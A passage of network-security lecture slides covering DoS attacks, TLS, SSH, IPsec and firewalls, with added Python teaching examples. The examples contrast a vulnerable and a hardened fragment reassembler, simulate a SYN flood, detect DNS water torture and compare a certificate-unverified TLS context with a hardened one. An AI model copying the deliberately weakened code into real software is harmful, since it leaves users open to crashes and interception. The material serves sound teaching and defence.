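                 relay_delay_s: float = 0.0) -> float:
    """Constructed channel model: propagation both ways + fob processing + relay delay."""
    return 2 * distance_m / C + fob_processing_s + relay_delay_s


def timing_resolution_needed_s(bound_m: float) -> float:
    """Round-trip timing resolution the car needs to separate inside from outside bound_m."""
    return 2 * bound_m / C
```

The check only works if the fob's processing delay is fixed and known to nanosecond precision: a 2 m bound corresponds to about 13 ns of round-trip time, so a fob whose response time varies by microseconds cannot be bounded, and a car that loosens the bound to absorb that jitter (see the 200 m case in the assertions) accepts the relay again. This is why distance bounding needs dedicated radio hardware rather than a firmware change.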
NO Attacks On This Model!
(photo slide)
Network Layer Attack: Examples
• Ping of death
• Smurf
• DDoS via traffic redirection (e.g., attacking routing algorithms)
Recap: Denial of Service (DoS)
• Definition: malicious attempts to disrupt the normal functioning of a targeted system, network, or service.
  – Make the target inaccessible to its intended users by overwhelming it with illegitimate traffic.
• Types of DoS Attacks:
  – Flooding Attacks: Overwhelm the target with a flood of traffic beyond its capacity to handle.
  – Resource Exhaustion Attacks: Exploit vulnerabilities to exhaust system resources such as memory, CPU, or bandwidth.
  – Distributed Denial of Service (DDoS): Coordinated attacks using multiple compromised devices or systems (botnets).
Ping of Death
• Ping (ICMP echo) packet: typically 64 bytes
  – ICMP (Internet Control Message Protocol)
• IP specification: maximum datagram size of 65,535 bytes (the total-length field is 16 bits).
• Ping of death attack: send an oversized ICMP datagram to the victim, carried in IP fragments whose offsets and lengths reassemble to more than 65,535 bytes.
  – Some systems, upon reassembling the oversized packet, will crash, freeze, or reboot, resulting in denial of service, e.g., through a buffer overflow in the reassembly code
• Can configure firewalls to block ICMP echo requests or limit their size.
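Added example (not from the lecture): the bounds check that a ping of death exploits when it is missing, shown as a vulnerable and a hardened fragment reassembler over constructed fragments. Each fragment is a tuple of (fragment offset in 8-byte units, payload bytes), the two quantities the IPv4 header carries; the 13-bit offset field can reach 8191, so offset*8 alone is already 65,528.

```python
# Added example: IPv4 fragment reassembly with and without the length check.
IP_MAX_DATAGRAM = 65535                        # 16-bit total-length field
IP_HEADER_LEN = 20                             # minimal IPv4 header, no options
MAX_PAYLOAD = IP_MAX_DATAGRAM - IP_HEADER_LEN  # 65,515 bytes of data may follow the header


def fragment_end(offset_units: int, payload: bytes) -> int:
    """Byte position (within the reassembled payload) just past this fragment."""
    return offset_units * 8 + len(payload)


def reassemble_unchecked(fragments):
    """Vulnerable version: trusts offset*8 + length. In Python the bytearray just
    grows past MAX_PAYLOAD; in the C implementations that crashed, the same write
    ran past the end of a fixed reassembly buffer."""
    buf = bytearray(MAX_PAYLOAD)
    end_seen = 0
    for offset_units, payload in fragments:
        start, end = offset_units * 8, fragment_end(offset_units, payload)
        buf[start:end] = payload
        end_seen = max(end_seen, end)
    return bytes(buf[:end_seen])


def reassemble_checked(fragments):
    """Hardened version: drop the whole datagram if any fragment would end beyond MAX_PAYLOAD."""
    buf = bytearray(MAX_PAYLOAD)
    end_seen = 0
    for offset_units, payload in fragments:
        end = fragment_end(offset_units, payload)
        if end > MAX_PAYLOAD:
            raise ValueError(f"fragment ends at byte {end}, beyond {MAX_PAYLOAD}: dropping datagram")
        start = offset_units * 8
        buf[start:end] = payload
        end_seen = max(end_seen, end)
    return bytes(buf[:end_seen])


def rejects(fragments) -> bool:
    """True if the hardened reassembler refuses this fragment train."""
    try:
        reassemble_checked(fragments)
    except ValueError:
        return True
    return False


# Constructed traffic: a normal ping (8-byte ICMP header + 56 data bytes) and a
# ping-of-death train whose last fragment sits at the maximum 13-bit offset.
NORMAL_PING = [(0, b"\x08\x00" + b"\x00" * 6 + b"x" * 56)]
PING_OF_DEATH = [(0, b"\x08\x00" + b"\x00" * 6 + b"a" * 8), (8191, b"b" * 100)]
```

The firewall-side mitigation on the slide (block or size-limit ICMP echo) only protects hosts whose reassembly code still has this bug; the actual fix is the check in `reassemble_checked`, applied to every protocol, since the oversized datagram does not have to be ICMP.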
Smurf attacks
• A host sends an ICMP echo request (ping) to a network broadcast address.
• Every host on the network receives the ICMP echo request and sends back an ICMP echo response.
• The attacker spoofs the IP source address as the IP of the intended victim.
• Every host on the intermediary network replies, flooding the victim and the intermediary network (one request is amplified into as many replies as there are hosts).
Distributed Denial of Service (DDoS)
• Attack vulnerable systems
  – exploit system vulnerabilities or trick users into downloading a trojan
• Create zombie networks (botnets)
• Direct the zombies to attack the victim
Transport Layer Attack: SYN flood
• SYN flood: TCP half-open connections
• To establish a legitimate TCP connection:
  – the client sends a SYN packet to the server
  – the server sends a SYN-ACK back to the client
  – the client sends an ACK back to the server to complete the three-way handshake
Transport Layer Attack: SYN flood
• SYN flood attack
  – The attacker initiates a TCP connection to the server with a SYN.
  – The server reserves resources and replies with a SYN-ACK.
  – The client then never sends back the ACK.
Transport Layer Attack: SYN flood
• The attacker floods the target system with a large volume of SYN packets but does not respond to the subsequent SYN-ACK packets.
• This leads to the accumulation of half-open connections on the target system, consuming resources such as memory and CPU.
• As a result, legitimate users may be unable to establish connections with the target system, leading to denial-of-service conditions.
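Added example (not from the lecture): a simulated listening socket with a bounded half-open queue, driven by constructed traffic, so the mechanism described on the last three slides can be watched rather than read. Real stacks add SYN cookies and adaptive timeouts; this model deliberately has neither (an assumption of the example).

```python
# Added example: SYN flood against a listener with a fixed half-open backlog.
from collections import OrderedDict


class Listener:
    def __init__(self, backlog: int = 128, syn_timeout_s: float = 60.0):
        self.backlog = backlog
        self.syn_timeout_s = syn_timeout_s
        self.half_open = OrderedDict()   # (src_ip, src_port) -> expiry time
        self.established = set()
        self.dropped_syns = 0

    def _expire(self, now: float) -> None:
        for key, expiry in list(self.half_open.items()):
            if expiry <= now:
                del self.half_open[key]

    def on_syn(self, src, now: float) -> bool:
        """True if a SYN-ACK is sent (state reserved), False if the SYN is dropped."""
        self._expire(now)
        if len(self.half_open) >= self.backlog:
            self.dropped_syns += 1
            return False
        self.half_open[src] = now + self.syn_timeout_s
        return True

    def on_ack(self, src, now: float) -> bool:
        """Third handshake packet: move the connection from half-open to established."""
        self._expire(now)
        if src not in self.half_open:
            return False
        del self.half_open[src]
        self.established.add(src)
        return True


def spoofed_source(i: int):
    """Constructed attacker source: a different bogus IP/port per SYN, never ACKed."""
    return (f"198.51.100.{i % 254 + 1}", 1024 + i)


def syn_flood_demo(backlog: int = 128, flood_syns: int = 1000) -> dict:
    srv = Listener(backlog=backlog)
    for i in range(flood_syns):
        srv.on_syn(spoofed_source(i), now=0.0)
    half_open_after_flood = len(srv.half_open)
    victim = ("192.0.2.10", 51000)                      # legitimate client
    refused = not srv.on_syn(victim, now=1.0)           # during the flood
    accepted_later = srv.on_syn(victim, now=61.0)       # after the half-open entries time out
    completed = srv.on_ack(victim, now=61.1)
    return {
        "half_open_after_flood": half_open_after_flood,
        "dropped_syns": srv.dropped_syns,
        "legit_refused_during_flood": refused,
        "legit_accepted_after_timeout": accepted_later,
        "legit_established": completed,
    }
```

The numbers make the asymmetry concrete: 128 spoofed packets (a few kilobytes) hold the listener closed for the full 60-second timeout, and the attacker only has to resend them once a minute. SYN cookies avoid this by keeping no state until the ACK arrives.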
Application Layer: DNS Water Torture
• Attack Overview:
  – Targets the Domain Name System (DNS), an application layer protocol for translating domain names into IP addresses and vice versa.
• Attack Method:
  – Involves flooding a DNS server with a large number of DNS queries.
  – Queries use randomized, non-existent (sub)domain names.
  – Goal is to overwhelm the DNS server's resources, such as cache, processing capacity, or network bandwidth.
DNS Water Torture
• DNS Water Torture
  – Send DNS queries for random, non-existent subdomains of the target zone, as recursive queries!
  – Because each name is unique it is never in any cache: the open resolvers forward every query upstream and get "domain not found" (NXDOMAIN) back
  – The queries therefore go all the way to the target's authoritative DNS servers!
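Added example (not from the lecture): detection logic for a water-torture flood, run over constructed resolver log lines. The log format (`<epoch> <client-ip> <qname> <rcode>`) and the two-label zone convention are assumptions of the example. The detector keys on the three properties the slide describes: many queries to one zone, almost all answered NXDOMAIN, with leftmost labels that look random (high character entropy, never repeated).

```python
# Added example: water-torture (random-subdomain NXDOMAIN flood) detector.
import math
from collections import defaultdict

# Constructed resolver log. example.com sees normal lookups; example.net is the
# target, queried through three open resolvers with random 8-char labels.
SAMPLE_LOG = """\
1698000000.01 203.0.113.5 www.example.com NOERROR
1698000000.02 203.0.113.5 mail.example.com NOERROR
1698000000.03 203.0.113.5 www.example.net NOERROR
1698000000.04 198.51.100.7 q8f3ka1z.example.net NXDOMAIN
1698000000.05 198.51.100.8 m2p9xw7r.example.net NXDOMAIN
1698000000.06 198.51.100.9 t5n0bv3k.example.net NXDOMAIN
1698000000.07 198.51.100.7 y1c6hd4s.example.net NXDOMAIN
1698000000.08 198.51.100.8 j7e2rl9u.example.net NXDOMAIN
1698000000.09 198.51.100.9 w4g8oz2f.example.net NXDOMAIN
1698000000.10 198.51.100.7 k9s1mp6c.example.net NXDOMAIN
1698000000.11 198.51.100.8 b3x5qn8t.example.net NXDOMAIN
1698000000.12 198.51.100.9 h6v2yk4d.example.net NXDOMAIN
1698000000.13 198.51.100.7 r0d7wj5a.example.net NXDOMAIN
"""


def label_entropy(label: str) -> float:
    """Shannon entropy (bits per character) of a DNS label; random labels score high."""
    if not label:
        return 0.0
    counts = defaultdict(int)
    for ch in label:
        counts[ch] += 1
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse(line: str):
    ts, client, qname, rcode = line.split()
    return float(ts), client, qname.lower().rstrip("."), rcode


def zone_of(qname: str) -> str:
    return ".".join(qname.split(".")[-2:])   # assumption: zones are two labels long


def detect_water_torture(log_text: str, min_queries: int = 5,
                         nx_ratio: float = 0.8, min_entropy: float = 2.5) -> dict:
    """Return {zone: stats} for zones whose query stream looks like a water-torture flood."""
    stats = defaultdict(lambda: {"total": 0, "nxdomain": 0, "labels": set(),
                                 "entropy_sum": 0.0, "clients": set()})
    for line in log_text.strip().splitlines():
        _, client, qname, rcode = parse(line)
        zone = zone_of(qname)
        first_label = qname[:-len(zone) - 1].split(".")[0] if qname != zone else ""
        s = stats[zone]
        s["total"] += 1
        s["nxdomain"] += rcode == "NXDOMAIN"
        s["labels"].add(first_label)
        s["entropy_sum"] += label_entropy(first_label)
        s["clients"].add(client)
    flagged = {}
    for zone, s in stats.items():
        if s["total"] < min_queries:
            continue
        ratio = s["nxdomain"] / s["total"]
        avg_entropy = s["entropy_sum"] / s["total"]
        unique = len(s["labels"]) / s["total"]
        if ratio >= nx_ratio and avg_entropy >= min_entropy and unique >= 0.8:
            flagged[zone] = {"queries": s["total"], "nxdomain_ratio": ratio,
                             "avg_entropy": avg_entropy, "clients": sorted(s["clients"])}
    return flagged
```

Note what the `clients` field shows: the sources are open resolvers, not the attacker, so blocking them punishes legitimate users of those resolvers. The usual response is rate-limiting NXDOMAIN answers per zone or per resolver, and, on the resolver side, not recursing on behalf of the whole Internet.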
DNS Water Torture
• DNS provider Dyn was attacked on 10/21/2016
• DDoS coming from tens of millions of IPs (IoT devices)
• Affected websites: Amazon, Twitter, Netflix, Spotify, PayPal, Airbnb, Reddit, Tumblr, GitHub and the New York Times, etc.
4. Controls
Network Security Controls
• Architecture & design
• Encryption
• Network security protocols
• Network security systems: firewall, IDS, security intelligence, etc.
Architecture & Design
• Segmentation/separation
  – De-Militarized Zone (DMZ)
• Redundancy: having backup systems in place to ensure service continuity.
  – Failover mode: if one system fails, another standby system automatically takes over to maintain service availability.
  – Cloud services: can offer high availability and distributed resources to handle failover.
• Eliminate single points of failure
• Fast recovery
  – minimizing downtime and restoring services as quickly as possible.
Encryption
• Encryption remains the most important and effective control against many network threats.
• However, it does NOT solve all the problems!
  – Recall the relay attacks on car models with passive keyless entry and start (PKES) systems.
Encryption
• Link encryption
  – Protects data transmitted over untrusted physical links
  – Transparent to the user (upper layers)
  – Messages are decrypted and re-encrypted at every intermediate node (router), so they exist in plaintext inside each node
Encryption
• End-to-end encryption
  – Application/presentation layer encryption
    • email communication, messaging apps, etc.
  – No decryption in transit
  – Protects data confidentiality against flawed or untrusted lower layers
Encryption
• Encryption remains the most important and effective control against many network threats.
• It's not the silver bullet
  – Before the point of encryption
  – After the point of decryption
    • E.g., Trojan horses
  – Key management
  – Other attacks: DoS, software/system vulnerabilities, etc.
Network Security Protocols
• SSL/TLS
  – Secure Sockets Layer / Transport Layer Security
  – Used mainly to secure Web traffic
  – HTTPS: the HTTP protocol over SSL/TLS encryption
• SSH
  – Secure Shell
  – Remote login
  – ssh <username>@linux.socs.uoguelph.ca
• IPsec
  – IP-level security suite
SSL/TLS
• Mid-'90s: introduction of concerns over credit card transactions over the Internet
• SSL (Secure Sockets Layer) designed to respond to these concerns and develop e-commerce
• Initially designed by Netscape, later moved to an IETF (Internet Engineering Task Force) standard
  – SSLv2 1995
  – SSLv3 1996
    • Fixed security problems
  – TLS v1.0 1999
    • IETF standard
  – TLS v1.1 2006
  – TLS v1.2 2008
  – TLS v1.3 2018
SSL/TLS
• SSL model: a handshake protocol for establishing a shared secret between client and server (plus server authentication), built from asymmetric primitives + PKI
• Server authentication (X.509 certificate)
  – Client authentication (optional)
• Encrypted communication
  – Implements a socket interface
  – Any socket-based application can be made to run on top of SSL
• Protects against:
  – Eavesdroppers, MITM attacks
SSL/TLS
• SSL sequence
  – Negotiate parameters
  – Key exchange
  – Authentication
  – Session
SSL/TLS
• Negotiation
  – Choice of encryption and hash functions, key exchange algorithms, protocol versions
  – E.g.: choice of 40-bit ("export") or 128-bit keys
• Key exchange
  – Diffie-Hellman key exchange
  – RSA-based key exchange
    • The client encrypts the secret key s (pre-master secret) with the public key of the server
SSL/TLS
• SSL authentication
  – Anonymous (no authentication)
  – RSA authentication (implicit: only the holder of the server's private key can recover the secret)
  – Signed Diffie-Hellman parameters
• Secure communication
  – Encryption: RC4 (Rivest Cipher 4, stream cipher), also DES, 3DES, AES, ...
  – Authentication: HMAC (Hash-based Message Authentication Code), using MD5 or SHA-1
• Why DES? It is insecure!
  – Legacy DES cipher suites are still defined and may be offered in TLS 1.2 handshakes; however, the server and/or the client can (and should) refuse them.
SSL/TLS
• SSL sequence (handshake diagram)
• TLS 1.3 (handshake diagram: after the handshake, a secure communication channel is established)
SSL/TLS
• TLS 1.3 stopped supporting all these ciphers
  – RC4 stream cipher
  – RSA key exchange
  – SHA-1 hash function
  – CBC (block) mode ciphers
  – MD5 algorithm
  – Various non-ephemeral Diffie-Hellman groups
  – EXPORT-strength ciphers
  – DES
  – 3DES
SSL/TLS
• TLS 1.3
  – Uses ephemeral Diffie-Hellman key agreement (forward secrecy: recorded sessions stay secret even if the server's long-term key leaks later)
  – The handshake is authenticated: the server signs the handshake transcript, including the Diffie-Hellman key shares, with the private key of its certificate. An attacker in the middle who substitutes their own key share cannot produce that signature, which is what prevents MITM attacks.
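Added example (not from the lecture): two client-side TLS configurations using Python's standard `ssl` module, one mirroring the legacy choices from the earlier slides (no authentication, TLS 1.2 allowed) and one restricted to TLS 1.3 with certificate and hostname verification, plus a check for the cipher-suite names TLS 1.3 removed. No network connection is made; the OpenSSL cipher-name conventions used in `cipher_is_legacy` are an assumption of the example.

```python
# Added example: weak vs hardened TLS client contexts, and a legacy-suite check.
import ssl

# OpenSSL suite names containing these are ones TLS 1.3 dropped. "DES" also
# matches DES-CBC3 (3DES); ADH/AECDH are anonymous (unauthenticated) suites.
LEGACY_MARKERS = ("RC4", "DES", "MD5", "EXP", "NULL", "ADH", "AECDH")


def cipher_is_legacy(name: str) -> bool:
    """True for RC4, (3)DES, MD5, export, NULL or anonymous suites, or an HMAC-SHA1
    CBC suite (OpenSSL names ending in '-SHA'; SHA256/SHA384 AEAD suites are fine)."""
    n = name.upper()
    return any(m in n for m in LEGACY_MARKERS) or n.endswith("-SHA")


def weak_client_context() -> ssl.SSLContext:
    """What an old default looked like: TLS 1.2 negotiable, no certificate or hostname check."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.check_hostname = False          # must be cleared before verify_mode
    ctx.verify_mode = ssl.CERT_NONE     # the 'anonymous' case: MITM is trivial
    return ctx


def hardened_client_context() -> ssl.SSLContext:
    """TLS 1.3 only (ephemeral DH + AEAD suites), chain and hostname verified."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)   # default: CERT_REQUIRED + hostname check
    ctx.minimum_version = ssl.TLSVersion.TLSv1_3
    ctx.load_default_certs()                         # system trust store for the X.509 chain
    return ctx


def audit(ctx: ssl.SSLContext) -> dict:
    """Summarise the security-relevant settings of a context."""
    return {
        "min_version": ctx.minimum_version.name,
        "verifies_cert": ctx.verify_mode == ssl.CERT_REQUIRED,
        "checks_hostname": ctx.check_hostname,
    }


def negotiated(host: str, port: int = 443, ctx=None):
    """Needs network access: connect and report (protocol version, cipher suite)."""
    import socket
    ctx = ctx or hardened_client_context()
    with socket.create_connection((host, port)) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.version(), tls.cipher()[0]
```

`audit` is the kind of check worth wiring into a test suite: a context with `verify_mode == CERT_NONE` is exactly the "anonymous" authentication mode from the slides, and it silently defeats everything the handshake signature is supposed to guarantee.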
SSH
• SSH: Secure Shell
  – An essential tool for managing servers, securely transferring files, and performing a host of other secure network functions
  – Designed in 1995 by Tatu Ylönen, replaced in 1996 by SSHv2
  – Fixed security holes, eventually standardized
• SSH: Example
  – To access the SoCS Linux server, we must use SSH
  – ssh <username>@linux.socs.uoguelph.ca
  – Username and password are the same as what we log into WebAdvisor with (Central login)
SSH
• Similar to SSL:
  – Operates on a client-server model with a socket-like interface
• Replaces (insecure) UNIX remote login (rlogin, telnet)
  – where usernames, passwords, and commands were transmitted in plaintext
• Flexible authentication architecture
  – Password, public key, SecurID, Kerberos, ...
• Compare with SSL:
  – No certificates by default; relies on a trust-on-first-use model
  – The client remembers the public key associated with each host (known_hosts) and warns if it changes
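Added example (not from the lecture): the trust-on-first-use host-key check an SSH client performs against its known_hosts store, with constructed key blobs (the hostname is the one from the slide; the keys are not its real keys). Fingerprints use the OpenSSH `SHA256:` presentation, which is what you compare against a value obtained out of band.

```python
# Added example: SSH trust-on-first-use host-key tracking with constructed keys.
import base64
import hashlib


def fingerprint(pubkey_blob: bytes) -> str:
    """OpenSSH-style fingerprint: 'SHA256:' + unpadded base64 of the key's SHA-256."""
    digest = hashlib.sha256(pubkey_blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


class KnownHosts:
    NEW, OK, MISMATCH = "new", "ok", "MISMATCH"

    def __init__(self):
        self._keys = {}   # host -> public key blob seen on first contact

    def check(self, host: str, pubkey_blob: bytes) -> str:
        """TOFU: the first key seen for a host is trusted blindly; any later change is refused."""
        stored = self._ke = self._keys.get(host)
        if stored is None:
            self._keys[host] = pubkey_blob
            return self.NEW
        return self.OK if stored == pubkey_blob else self.MISMATCH

    def check_with_pinned(self, host: str, pubkey_blob: bytes, expected_fingerprint: str) -> str:
        """Closes the TOFU gap: require an out-of-band fingerprint even on first contact."""
        if fingerprint(pubkey_blob) != expected_fingerprint:
            return self.MISMATCH
        return self.check(host, pubkey_blob)


# Constructed key blobs (NOT the real keys of any host).
KEY_A = b"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAI-constructed-key-A"
KEY_B = b"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAI-constructed-key-B"
HOST = "linux.socs.uoguelph.ca"
```

A `MISMATCH` is the "REMOTE HOST IDENTIFICATION HAS CHANGED" warning: it is either a reinstalled server or an active man-in-the-middle, and the client cannot tell which, so the right response is to stop and verify, not to delete the known_hosts line. `check_with_pinned` is what a deployment script should do, since plain TOFU offers nothing against an attacker present on the very first connection.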
IP Security Issues
• When an entity receives an IP packet, it has no assurance of:
  – Data source authentication / data integrity:
    • The packet comes from the source it claims to
    • The content of the packet remained unchanged during transport
    • The recipient is the intended one
  – Confidentiality:
    • The original data was not inspected by a third party while the packet travelled from the sender to the receiver
IP Security Issues & IPsec
• Eavesdropping
• Modification of packets in transit
• Identity spoofing (forged source IP addresses)
• Denial of Service
• Many solutions are application-specific
  – TLS for the Web, S/MIME (Secure/Multipurpose Internet Mail Extensions) for email, SSH for remote login
• IPsec aims to provide a framework of open standards for secure communications over IP
  – Protect every protocol running on top of IPv4 and IPv6
IPsec
• Internet Protocol Security (IPsec)
• Method of protecting IP datagrams
  – units of information exchanged over the Internet
• Protection for IP and upper-layer protocols
• Designed for IPv6, backported to IPv4
• Two options:
  – AH (Authentication Header)
  – ESP (Encapsulating Security Payload)
• Two modes:
  – Transport mode: use the original IP header
  – Tunnel mode: use a new IP header
AH (Authentication Header)
• Provides source authentication and data integrity, NO confidentiality
  – Simple design: add a header with authentication data between the IP header and the data field.
  – Security parameters (SPI) and sequence number
  – Authentication data (usually HMAC-SHA1-96)
  – IP protocol field: 51
(AH packet layout figure; source: Wikipedia)
AH (Authentication Header)
• AH header includes:
  – connection identifier (Security Parameters Index)
  – authentication data: a keyed message digest (ICV) calculated over the whole IP datagram, with mutable header fields (TTL, checksum, ...) counted as zero
  – next header field specifies the data type (e.g., TCP, UDP, ICMP)
(AH header layout figure; source: Wikipedia)
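Added example (not from the lecture): computing and verifying an AH-style integrity check value over an IPv4 header, the AH fields and the payload, with the mutable header fields zeroed as RFC 4302 requires. HMAC-SHA1-96 is used as on the slide; the key, addresses and payload are constructed. The point the code makes is the one the slide glosses over: a router legitimately changes TTL and the header checksum on every hop, so those fields must be excluded, while source address and payload remain covered.

```python
# Added example: AH integrity check value (ICV) over an IPv4 datagram.
import hashlib
import hmac
import ipaddress
import struct

AH_PROTO = 51


def ipv4_header(src: str, dst: str, payload_len: int, ttl: int = 64,
                proto: int = AH_PROTO, ident: int = 0x1234, dscp_ecn: int = 0) -> bytes:
    """Minimal 20-byte IPv4 header, checksum field left at zero."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, dscp_ecn, 20 + payload_len, ident, 0x4000,
                       ttl, proto, 0, ipaddress.IPv4Address(src).packed,
                       ipaddress.IPv4Address(dst).packed)


def ipv4_checksum(header: bytes) -> int:
    h = bytearray(header)
    h[10:12] = b"\x00\x00"
    s = sum(struct.unpack("!10H", bytes(h)))
    while s >> 16:
        s = (s & 0xFFFF) + (s >> 16)
    return (~s) & 0xFFFF


def with_checksum(header: bytes) -> bytes:
    h = bytearray(header)
    struct.pack_into("!H", h, 10, ipv4_checksum(header))
    return bytes(h)


def router_hop(header: bytes) -> bytes:
    """What every router does in transit: decrement TTL, recompute the checksum."""
    h = bytearray(header)
    h[8] -= 1
    return with_checksum(bytes(h))


def zero_mutable(header: bytes) -> bytes:
    """Mutable fields (RFC 4302): DSCP/ECN, flags+fragment offset, TTL, header checksum."""
    h = bytearray(header)
    h[1] = 0
    h[6:8] = b"\x00\x00"
    h[8] = 0
    h[10:12] = b"\x00\x00"
    return bytes(h)


def ah_fields(spi: int, seq: int, next_header: int, icv_len: int = 12) -> bytes:
    """AH header with the ICV field zeroed: next header, payload length (32-bit words - 2),
    reserved, SPI, sequence number, ICV placeholder."""
    payload_len_field = (12 + icv_len) // 4 - 2
    return struct.pack("!BBHII", next_header, payload_len_field, 0, spi, seq) + b"\x00" * icv_len


def compute_icv(key: bytes, header: bytes, ah: bytes, payload: bytes) -> bytes:
    """HMAC-SHA1-96: SHA-1 HMAC truncated to 96 bits, over immutable header + AH + payload."""
    return hmac.new(key, zero_mutable(header) + ah + payload, hashlib.sha1).digest()[:12]


def verify_icv(key: bytes, header: bytes, ah: bytes, payload: bytes, icv: bytes) -> bool:
    return hmac.compare_digest(compute_icv(key, header, ah, payload), icv)


# Constructed datagram: an internal host talking to the 10.0.0.10 server from the slides.
KEY = b"constructed-ah-key-not-for-real-use"
PAYLOAD = b"constructed TCP segment bytes"
AH = ah_fields(spi=0x1000, seq=1, next_header=6)   # next header 6 = TCP
HDR = with_checksum(ipv4_header("10.0.1.5", "10.0.0.10", len(AH) + len(PAYLOAD)))
```

The same zeroing rule is why AH does not survive NAT: a NAT box rewrites the source address, which is deliberately immutable here, so the ICV fails at the receiver. ESP in tunnel mode avoids the problem by authenticating only the inner packet.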
ESP (Encapsulating Security Payload)
• Provides confidentiality, host authentication, and data integrity.
  – Encapsulates the datagram rather than adding a header
  – Next header field is in the ESP trailer
  – ESP format: Security Parameters Index, Sequence Number, Payload Data, Padding, Pad Length, Next Header, Authentication Data
  – IP protocol field: 50
(ESP packet layout figure; source: Wikipedia)
IPsec
(figure: AH and ESP in transport and tunnel mode)
Firewalls
• From RFC 1636
  – "hard crunchy outside, soft chewy inside"
• Bellovin, Shifting the Odds
  – "firewalls are a networking response to a software engineering problem"
Firewall Types
• Packet filter
• Stateful packet filter
• Application-layer and transport-layer gateways
Firewall Tasks
• Allow or block traffic
  – based on source IP and/or destination IP, and/or destination port
  – filter traffic coming "in" or going "out"
• Question: can we block based on source port?
• Answer: why bother?
  – Ports are numerous (ranging from 0 to 65535) and are not as strongly associated with the identity of the sender as IP addresses are
  – the attacker can choose any arbitrary source port
  – not a reliable indicator for filtering traffic
Firewall Tasks
• A firewall realizes access control over the traffic
  – Allow/disallow certain packets
• A firewall may perform other duties:
  – Network address translation (NAT)
  – Logging (forensics)
  – Flagging (intrusion detection)
  – Authentication, encryption/decryption (VPN)
  – Quality of Service (differentiated services)
    • the ability to provide different priority to different types of traffic, users, or data flows
Firewall Tasks
• Example 1: firewall on a router (screenshot)
  – Always allow HTTP traffic (TCP port 80)
  – Port mapping
  – Allow traffic from any client
• Example 2 (screenshot)
  – Always allow video conferencing (TCP/UDP on 7648, 24032)
  – Only allow a small range of IPs
  – Log requests from unknown sources
• Example 3 (screenshot)
  – Always allow outbound AIM traffic, from any internal computer to any external computer
  – Log all
Firewall Policies
• A firewall filters traffic based on policy
  – the policy determines what is acceptable traffic
  – Allow or Deny
  – by mapping attributes to IP addresses and ports

Action | Src IP      | Src Port | Dst IP    | Dst Port | Protocol | Comment
allow  | *           | *        | 10.0.0.10 | 80       | TCP      | Allow access to Server
allow  | 10.0.1.0/24 | *        | *         | 80       | TCP      | Web traffic outbound
deny   | *           | *        | *         | *        | *        | Default (default deny)
Default Policy
• The default policy specifies what to do if no other policy applies.
• Default deny
  – Specifies the connectivity that is explicitly allowed.
  – More secure but may break functionality.
  – Most organizations default to default deny.
• Default accept
  – Specifies the connectivity that is explicitly disallowed.
  – Less secure but allows functionality.
  – Most OSes default to default accept.
Rule Order
• In most firewall policy languages, rule order matters!
  – Firewall policies are non-monotonic (a mix of allow and deny)
  – The policy is evaluated until the packet matches a rule (first match, not best match)

Action | Src IP      | Src Port | Dst IP    | Dst Port | Protocol | Comment
allow  | *           | *        | 10.0.0.10 | 80       | TCP      | Allow access to Server
deny   | *           | *        | *         | *        | *        | Default
allow  | 10.0.1.0/24 | *        | *         | 80       | TCP      | Web traffic outbound (this rule will NOT work: the deny above already matches)
Rule Order
• In most firewall policy languages, rule order matters!
  – Firewall policies are non-monotonic (a mix of allow and deny)
  – The policy is evaluated until the packet matches a rule (first match, not best match)
  – Can optimize firewall performance (e.g., frequent deny first)
  – Can be useful to express complex requirements
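Added example (not from the lecture): a first-match packet filter that evaluates the two rule tables from the previous slides, plus a simple shadowing check that catches the mis-ordered "Web traffic outbound" rule before it reaches production. The server address 10.0.0.10 and the 10.0.1.0/24 network come from the slides; the packets are constructed. The shadowing check is deliberately conservative (it only reports a rule when an earlier rule covers every field), which is enough for the slide's case and never produces false reports.

```python
# Added example: first-match firewall policy evaluation and shadowed-rule detection.
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    proto: str


@dataclass(frozen=True)
class Rule:
    action: str
    src: str = "*"
    sport: str = "*"
    dst: str = "*"
    dport: str = "*"
    proto: str = "*"
    comment: str = ""


def _ip_match(pattern: str, ip: str) -> bool:
    return pattern == "*" or ipaddress.ip_address(ip) in ipaddress.ip_network(pattern, strict=False)


def _field_match(pattern, value) -> bool:
    return pattern == "*" or str(pattern).lower() == str(value).lower()


def matches(rule: Rule, pkt: Packet) -> bool:
    return (_ip_match(rule.src, pkt.src) and _field_match(rule.sport, pkt.sport)
            and _ip_match(rule.dst, pkt.dst) and _field_match(rule.dport, pkt.dport)
            and _field_match(rule.proto, pkt.proto))


def evaluate(rules, pkt: Packet, default: str = "deny"):
    """First match wins. Returns (action, index of the rule that fired, or None for the default)."""
    for i, rule in enumerate(rules):
        if matches(rule, pkt):
            return rule.action, i
    return default, None


def _covers(pattern_a, pattern_b, is_ip: bool) -> bool:
    """Does pattern_a match everything pattern_b matches?"""
    if pattern_a == "*":
        return True
    if pattern_b == "*":
        return False
    if is_ip:
        a = ipaddress.ip_network(pattern_a, strict=False)
        b = ipaddress.ip_network(pattern_b, strict=False)
        return b.subnet_of(a)
    return str(pattern_a).lower() == str(pattern_b).lower()


def shadowed_rules(rules):
    """Indices of rules that can never fire because an earlier rule covers every packet they match."""
    out = []
    for j, later in enumerate(rules):
        for earlier in rules[:j]:
            if (_covers(earlier.src, later.src, True) and _covers(earlier.sport, later.sport, False)
                    and _covers(earlier.dst, later.dst, True) and _covers(earlier.dport, later.dport, False)
                    and _covers(earlier.proto, later.proto, False)):
                out.append(j)
                break
    return out


# The two tables from the slides.
POLICY = [
    Rule("allow", dst="10.0.0.10", dport="80", proto="TCP", comment="Allow access to Server"),
    Rule("allow", src="10.0.1.0/24", dport="80", proto="TCP", comment="Web traffic outbound"),
    Rule("deny", comment="Default"),
]
MISORDERED = [POLICY[0], POLICY[2], POLICY[1]]   # default deny moved above the outbound rule
```

Running `shadowed_rules` on every policy change is cheap and turns the slide's "this rule will NOT work" into a test failure instead of a helpdesk ticket. Note that the lists are evaluated top-down exactly like iptables chains: the first rule that matches decides, and nothing after it is consulted.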
